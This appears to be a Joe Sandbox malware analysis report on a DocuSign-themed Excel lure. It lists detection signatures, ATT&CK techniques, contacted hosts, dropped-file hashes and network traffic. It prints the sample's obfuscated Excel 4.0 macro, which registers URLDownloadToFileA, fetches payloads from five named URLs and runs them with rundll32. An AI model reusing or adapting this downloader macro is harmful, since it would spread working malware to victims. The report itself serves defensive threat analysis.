Analysis Report Complaint-1992179913-02182021.xls
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
| |
JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
Uses secure TLS version for HTTPS connections |
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Automated click: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: |
Source: | Binary or memory string: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Yara detected hidden Macro 4.0 in Excel |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol13 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer1 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
rzminc.com | 72.52.227.180 | true | false | | unknown |
crt.sectigo.com | 91.199.212.52 | true | false | | unknown |
jugueterialatorre.com.ar | 138.36.237.100 | true | false | | unknown |
pathinanchilearthmovers.com | 162.241.80.6 | true | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true |
| unknown | |
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.241.80.6 | unknown | United States | | 46606 | UNIFIEDLAYER-AS-1US | false |
138.36.237.100 | unknown | Argentina | | 27823 | DattateccomAR | false |
91.199.212.52 | unknown | United Kingdom | | 48447 | SECTIGOGB | false |
72.52.227.180 | unknown | United States | | 32244 | LIQUIDWEBUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 356738 |
Start date: | 23.02.2021 |
Start time: | 15:56:39 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Complaint-1992179913-02182021.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.expl.evad.winXLS@11/8@4/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
162.241.80.6 | Get hash | malicious | Browse |
| |
138.36.237.100 | Get hash | malicious | Browse |
| |
91.199.212.52 | Get hash | malicious | Browse |
| |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
crt.sectigo.com | Get hash | malicious | Browse |
| |
rzminc.com | Get hash | malicious | Browse |
| |
jugueterialatorre.com.ar | Get hash | malicious | Browse |
| |
pathinanchilearthmovers.com | Get hash | malicious | Browse |
| |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
DattateccomAR | Get hash | malicious | Browse |
| |
SECTIGOGB | Get hash | malicious | Browse |
| |
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1559 |
Entropy (8bit): | 7.399832861783252 |
Encrypted: | false |
SSDEEP: | 48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep |
MD5: | ADAB5C4DF031FB9299F71ADA7E18F613 |
SHA1: | 33E4E80807204C2B6182A3A14B591ACD25B5F0DB |
SHA-256: | 7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676 |
SHA-512: | 983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 3.1079460455882972 |
Encrypted: | false |
SSDEEP: | 3:kkFklrGmaE/XfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15z:kKVTkqjXxp9jKFlIaYM2+/LOjA/ |
MD5: | 5C0062E1FDB7DD1FA8E52F75B646DB76 |
SHA1: | FD494729C69970219FF8E770389F06C234DF0B80 |
SHA-256: | 9BA8C1B92E4FA8A1AD67B0742654642F1B375E3AB1A6ECF94E3C62C5B2AAF385 |
SHA-512: | 54CCB267EB033615F38F04CAEA9547117F3EA6CF6A7269053599EB9294ADF142D1B43E36E7A534C50F1A3264973712BD5A2585F81C2CEED366BA6F24B6D02B12 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 132891 |
Entropy (8bit): | 5.375885170203908 |
Encrypted: | false |
SSDEEP: | 1536:9cQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:ZcQ9DQW+z0XiK |
MD5: | 45B476C199428226B8C8D806849E0314 |
SHA1: | 0328182400FD1C6524C344C653F87B862E5C2B88 |
SHA-256: | 27A61C896C19DD04F94D375E4F7E4C65D0E9926668EEC6F4151972E0EDC8B2EF |
SHA-512: | 6009F199524974C95991E99FAF8A4C344CE9ADB60AC06EB2E39C0E09DDA9B1FF829C114630D226BD26163557644B56D85949E9BDF9D2222EFB124C03A098EA51 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 31496 |
Entropy (8bit): | 7.6412973417306045 |
Encrypted: | false |
SSDEEP: | 384:A2EQtJPWEt4wFVfViKzV8aoVT0QNuzWKPqSFpBHRb7y3Tud3KyGqjNHWqK:E2hViKiW+u7qS7BHRbu3TukcRTK |
MD5: | 97AEF11CCFBF9743A5D7C8DCDC32BDBC |
SHA1: | B2A73BBA538D4B8A9E3B9149BE140CA0078FFD6F |
SHA-256: | DAEC2DDEA16AA1520E481F8B0DE9CEC060E257C0AC96B3D34187DF65DBF4B0A8 |
SHA-512: | A822C5919341CCF2A31FABCE1AC10AF6B8A675D24F7CCCD06E932629E0C89013B2B595E978644F4DED5CC8A564AB4BF122F181E5968E6CFFA3D1585AFA99215E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2300 |
Entropy (8bit): | 4.654213571979597 |
Encrypted: | false |
SSDEEP: | 48:8WK1/F+R3HVF8pB6pWK1/F+R3HVF8pB6:8Ff6H8pKFf6H8p |
MD5: | 6CE24E47B88D8ED0380A85F11DC331B4 |
SHA1: | 0609005F0D8C9B14109CB3D4792DE2824B5BB824 |
SHA-256: | 67F633A7382E5BA00488B61F8BA1DCA1F3A3F90A21187294173EE211FB0E5810 |
SHA-512: | 58263D0E991342D0292CF3251ECCA2E92A036AD9CDA913871CD78034D7216B1139FA586DE32B97A022B8CE5D6FCFFF83F83818E22A11F53EBA857D56B90053BC |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.664222086421206 |
Encrypted: | false |
SSDEEP: | 12:8ErMXU3uElPCH2YgcXPE3YcsqlJ0+WrjAZ/2bDDeLC5Lu4t2Y+xIBjKZm:8pgcXOdlkAZiDz87aB6m |
MD5: | 5DE43DFCF510EC94C5C28944111630D2 |
SHA1: | 1913CEE4AB5983FB2B00EBF318A98F7079326E5B |
SHA-256: | 07E557AA6595801D8EFB7A73A39317C26BB8302B7B4986A653D1979A2F536938 |
SHA-512: | B2C6A7BF332C5361C41EFD0FADAD382DE773CE3D14D3F20A9EB4903B7F8CB1E0D6083BCBDA6608AAB7DC599ACBBE90C7EAB6827333C43DAF9A81C11445D1930A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152 |
Entropy (8bit): | 4.661078402497766 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMYlIFc7FXa+1lIFc7FXamMYlIFc7FXav:dj6YlycZtlycZMYlycZU |
MD5: | 44EF8DDBAA84E0410A000AC715DF4B24 |
SHA1: | EA46B84FFE9DB049C77EA50E5E3BB02C3EC523D5 |
SHA-256: | 976B865F247F1FCD9555213FC0B6D702B9FFC050D42A46AF56492C16B81D5912 |
SHA-512: | 46ABB9CAB43385DDFD433C6CF4035DE59DB53454018CFBABF92933066050447B265672FCA4EB94F94DFF0AF1B555E132FEDDB17264325D7EACD54295059BBB1C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 111230 |
Entropy (8bit): | 6.668172188898463 |
Encrypted: | false |
SSDEEP: | 3072:5s8rmOAIyyzElBIL6lECbgBGzP5xLm7TdKojnGzeNf7jmGzeNfQaGzeNf/+s8rmd:q8rmOAIyyzElBIL6lECbgB+P5Nm7TdKX |
MD5: | 4E04F9F72397B3B758687899986998DC |
SHA1: | 16B81519271E5F3726D93BDEC4DAB856589D10D6 |
SHA-256: | C081FAA65265BD90138236337CA45F1BDCE683763B34EE84352451F956365666 |
SHA-512: | 8214A33E5B42DD175E5A8FC29FB36B1BB1B52717A705B6E270CED539FF939167DD1E15E1C3A11DD0FEF76E2935CEE2650ABB26DDB2500E635E6AD23EBFDD4704 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.697666945848156 |
TrID: |
|
File name: | Complaint-1992179913-02182021.xls |
File size: | 145920 |
MD5: | b2c46df91cfe891f61af65277461b32b |
SHA1: | fd329e179663a40c31f5c567228a59349928a6a5 |
SHA256: | 3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5 |
SHA512: | 809890b32a5f370054043a5abbbffdb45e1b1bf5e8f781d2f5537e26b9c5a171c450559e731ec6bbc5b798f3a131e94bb9f06d3523e7a362182b035203a6fcbb |
SSDEEP: | 3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/9:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOM0 |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "Complaint-1992179913-02182021.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-18 13:42:21 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.321292606979 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.2746714277 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 135085 |
Entropy: | 3.69042254796 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . . |
Macro 4.0 Code |
---|
,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 23, 2021 15:59:53.371618986 CET | 192.168.2.3 | 8.8.8.8 | 0xb938 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 15:59:54.063407898 CET | 192.168.2.3 | 8.8.8.8 | 0x5b71 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 15:59:55.116333008 CET | 192.168.2.3 | 8.8.8.8 | 0xd82d | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 15:59:57.724984884 CET | 192.168.2.3 | 8.8.8.8 | 0x885d | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 23, 2021 15:59:53.428792953 CET | 8.8.8.8 | 192.168.2.3 | 0xb938 | No error (0) | 72.52.227.180 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 15:59:54.216335058 CET | 8.8.8.8 | 192.168.2.3 | 0x5b71 | No error (0) | 162.241.80.6 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 15:59:55.405550003 CET | 8.8.8.8 | 192.168.2.3 | 0xd82d | No error (0) | 138.36.237.100 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 15:59:57.773802042 CET | 8.8.8.8 | 192.168.2.3 | 0x885d | No error (0) | 91.199.212.52 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 16:00:47.654854059 CET | 8.8.8.8 | 192.168.2.3 | 0xc792 | No error (0) | www.tm.a.prd.aadg.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49717 | 72.52.227.180 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 15:59:53.589113951 CET | 1090 | OUT | |
Feb 23, 2021 15:59:54.049882889 CET | 1091 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49719 | 162.241.80.6 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 15:59:54.379425049 CET | 1099 | OUT | |
Feb 23, 2021 15:59:55.088042021 CET | 1103 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.3 | 49720 | 138.36.237.100 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 15:59:55.754218102 CET | 1104 | OUT | |
Feb 23, 2021 15:59:56.826869011 CET | 1106 | IN | |
Feb 23, 2021 15:59:56.826890945 CET | 1106 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.3 | 49723 | 91.199.212.52 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 15:59:57.843202114 CET | 1123 | OUT | |
Feb 23, 2021 15:59:57.904131889 CET | 1125 | IN |